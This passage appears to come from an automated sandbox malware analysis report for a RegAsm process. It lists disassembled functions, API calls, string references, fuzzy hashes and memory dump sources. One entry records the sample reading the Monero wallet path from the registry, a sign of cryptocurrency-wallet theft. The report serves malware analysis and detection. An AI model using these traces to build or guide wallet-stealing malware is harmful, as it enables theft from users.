                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-3564305576
                                              • Opcode ID: e49b25f4510910c1ec9b1a8664bd6e4e7f9b73ed718144a467c4f7868f5baf7c
                                              • Instruction ID: d38b93d96f21fe27e1091b674140ac1a1161378ab0b33a75ba7997f4925b67b3
                                              • Opcode Fuzzy Hash: e49b25f4510910c1ec9b1a8664bd6e4e7f9b73ed718144a467c4f7868f5baf7c
                                              • Instruction Fuzzy Hash: 0F11A0B8708551EFD718CE2AE844AD6BBB8AF66A05F14045EF045CB322D334E945C7A2
                                              Strings
                                              • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1B6AF105
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                              • API String ID: 0-2312637080
                                              • Opcode ID: a3e18e89aefdfa0088a57b8718a49e8ee7025f945affdcfd00a11efe93eabec3
                                              • Instruction ID: 828fda69bfe6fbfcdff72820d6f3d66d275bc5ef9517f672d452c5a6c2b83c62
                                              • Opcode Fuzzy Hash: a3e18e89aefdfa0088a57b8718a49e8ee7025f945affdcfd00a11efe93eabec3
                                              • Instruction Fuzzy Hash: C7019EB66042415EDB61966EFC40FD7BBD8EBD4621F05046AF5ADC3201D261AC8583A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s_stat
                                              • API String ID: 0-920702477
                                              • Opcode ID: e5fcded197eac5e49de9e3ba26cece78bd1511baf6fe28a4da9280dec7ba73d9
                                              • Instruction ID: c4661f01169a2708ffa8fddb1e2c3433bbd8d41ab9e93192bb246d592659a132
                                              • Opcode Fuzzy Hash: e5fcded197eac5e49de9e3ba26cece78bd1511baf6fe28a4da9280dec7ba73d9
                                              • Instruction Fuzzy Hash: AFF027A2B053523BDB008679BC81BCAEBD5AB64161F444635F40C92154D312BCA183D1
                                              Strings
                                              • CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1B6A7F76
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
                                              • API String ID: 0-3072645960
                                              • Opcode ID: c8417227ba882ca1ac31d21dfb13beb6a161c0604cf127696377716670763341
                                              • Instruction ID: 59f0c2369a93136322d7304b827685699972a6dfffa48dd052ece24d250c014c
                                              • Opcode Fuzzy Hash: c8417227ba882ca1ac31d21dfb13beb6a161c0604cf127696377716670763341
                                              • Instruction Fuzzy Hash: 73F0F0BAA043028ADF105F29FC02BC9B7D0AFE1321F15012AF84896290E764A88587A1
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411E92,00000000), ref: 00411A9F
                                              • HeapAlloc.KERNEL32(00000000,?,00411E92,00000000), ref: 00411AA6
                                              • wsprintfW.USER32 ref: 00411AB7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocProcesswsprintf
                                              • String ID: %hs
                                              • API String ID: 659108358-2783943728
                                              • Opcode ID: b006a00c94b64a5e6a63bf74cb6fc989fd022a47c30863d2ab4432066fb547e3
                                              • Instruction ID: 1c615c54e01f175df760b42947a92ff9fe8b5b224df655030d05607843f00ac6
                                              • Opcode Fuzzy Hash: b006a00c94b64a5e6a63bf74cb6fc989fd022a47c30863d2ab4432066fb547e3
                                              • Instruction Fuzzy Hash: 39D05E3174022477C6202BA4AC0AFA57E38EB05AA3F800030FA0A86151CD698A1147FA
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B786B50
                                              • cannot open file, xrefs: 1B786B59
                                              • %s at line %d of [%.10s], xrefs: 1B786B5E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-1799306995
                                              • Opcode ID: 1ce083f51610d9518e5d6863c0f978e8e6bc103c39a92b16259da904a06f730a
                                              • Instruction ID: 42741db42894c7ea46633709cc87a12ab2b7856c1a5d90c2f45681cf5cbb6081
                                              • Opcode Fuzzy Hash: 1ce083f51610d9518e5d6863c0f978e8e6bc103c39a92b16259da904a06f730a
                                              • Instruction Fuzzy Hash: DCB09B5550924035DA012974CC02FDE3C147764E06F818454714537395D155C091C235
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81868e2e5691cbd84d66fb5ebd2ecfee2e7f99df9be68527d7319b28201c9681
                                              • Instruction ID: 2dd64fb8ef3e1bee80494d187ab578a3eea3580244a2e5ce1e6df376e27ef934
                                              • Opcode Fuzzy Hash: 81868e2e5691cbd84d66fb5ebd2ecfee2e7f99df9be68527d7319b28201c9681
                                              • Instruction Fuzzy Hash: 5141DDB66013019FDB14CF28D981AA2F7E0FF94324F14456AE98787A22D772FC51CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f37f787fe65c4bda945479cfbeebef1d6a1c130538cd1e6f3fa2038f47e137a2
                                              • Instruction ID: 57ea503394defcf5f64aa14cec31f80cc51916020d54c720096f091b86c00cad
                                              • Opcode Fuzzy Hash: f37f787fe65c4bda945479cfbeebef1d6a1c130538cd1e6f3fa2038f47e137a2
                                              • Instruction Fuzzy Hash: 8231BEF6A053019BDB108F78EC40A96B3A4EB94661F00097AE945C7690E322ED84DBA1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                              • Instruction ID: f44db62cd0b579509f4aa6f3a400b71003f4f25e03882ddd4aec561906a1dbc9
                                              • Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                              • Instruction Fuzzy Hash: 5C3172B5504B419FDB20CB25E8506EBBBE1BFA5314F084D6ED4DAC6900D371F88ACB55
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s$H_prolog
                                              • String ID:
                                              • API String ID: 1158113254-0
                                              • Opcode ID: 72671a45a9eca9d79b2a07ad106bcfcc466bf569881abec9326c48bdd8826eda
                                              • Instruction ID: 46d7b75c712e8c7e73b6622e7cec96a3a0e6db06e8b2e8e20495d57be24ae387
                                              • Opcode Fuzzy Hash: 72671a45a9eca9d79b2a07ad106bcfcc466bf569881abec9326c48bdd8826eda
                                              • Instruction Fuzzy Hash: 2B21F571600502AFCB28DF60CAD1EFBB3ACEF54354B10412FE017D6591EBB8ED918A64
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004128A5
                                              • strtok_s.MSVCRT ref: 004128CC
                                              • StrCmpCA.SHLWAPI(00000000,004276DC,00000001,?,?,?,0041822C), ref: 00412908
                                                • Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
                                                • Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC
                                              • strtok_s.MSVCRT ref: 00412944
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s$H_prologlstrcpylstrlen
                                              • String ID:
                                              • API String ID: 539094379-0
                                              • Opcode ID: f6a3b695288a34808bbe589bb357be1ef5427cf9242ace7d8b57039bee6dc709
                                              • Instruction ID: 16669ff98ca41c50ad208ab7513e07a337bc7d5c363cc68b379856a7f7a10eb1
                                              • Opcode Fuzzy Hash: f6a3b695288a34808bbe589bb357be1ef5427cf9242ace7d8b57039bee6dc709
                                              • Instruction Fuzzy Hash: BD21BBB1710505ABC714DF68CA85BEF73ACEF14315F00412FE016E6191EBBCD9858A64
                                              APIs
                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 1B87F4E0
                                              • GetLastError.KERNEL32(?,?,?,?), ref: 1B87F4ED
                                              • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1B87F513
                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 1B87F539
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID: FilePointer$ErrorLast
                                              • String ID:
                                              • API String ID: 142388799-0
                                              • Opcode ID: 67f0583d43038b6b74bfaae0a203d09bab8be8ba6704f424a009f9666f2c0e95
                                              • Instruction ID: e5dbb8628991e16f7b11f8a770bda6e6585dd71a4c977efd5605f1a82e3e3176
                                              • Opcode Fuzzy Hash: 67f0583d43038b6b74bfaae0a203d09bab8be8ba6704f424a009f9666f2c0e95
                                              • Instruction Fuzzy Hash: 651157B180026ABBDF00AF56CC889DEBFB9EF00B64F104144F824A31A0D731DA84CBA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                              • Instruction ID: 4dac488de0b5ea22eb8b3e3f0a927e5300db818d9023db6c84b715e62ad05f11
                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                              • Instruction Fuzzy Hash: 3211807200114EBBCF125F84CC05CEE3F27BB58354B198416FE6859135C33AC9B2AB8A
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00410889
                                              • lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                              • lstrcpy.KERNEL32(00000000), ref: 004108D8
                                              • lstrcat.KERNEL32(?,?), ref: 004108E3
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrcatlstrcpylstrlen
                                              • String ID:
                                              • API String ID: 809291720-0
                                              • Opcode ID: b4c0e9b2cb4bcdc9af996fdff662cf08f9ccba68d92128a37ec5bc8ecda07743
                                              • Instruction ID: 25bb938962741e6da67c87ee047a36148cef465288252c8de946109ad76006c3
                                              • Opcode Fuzzy Hash: b4c0e9b2cb4bcdc9af996fdff662cf08f9ccba68d92128a37ec5bc8ecda07743
                                              • Instruction Fuzzy Hash: A4011E76900245EFCB109F9AD88459EFBB5FF49314B10883FE599D7210C7B499C0DB54
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                              • RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
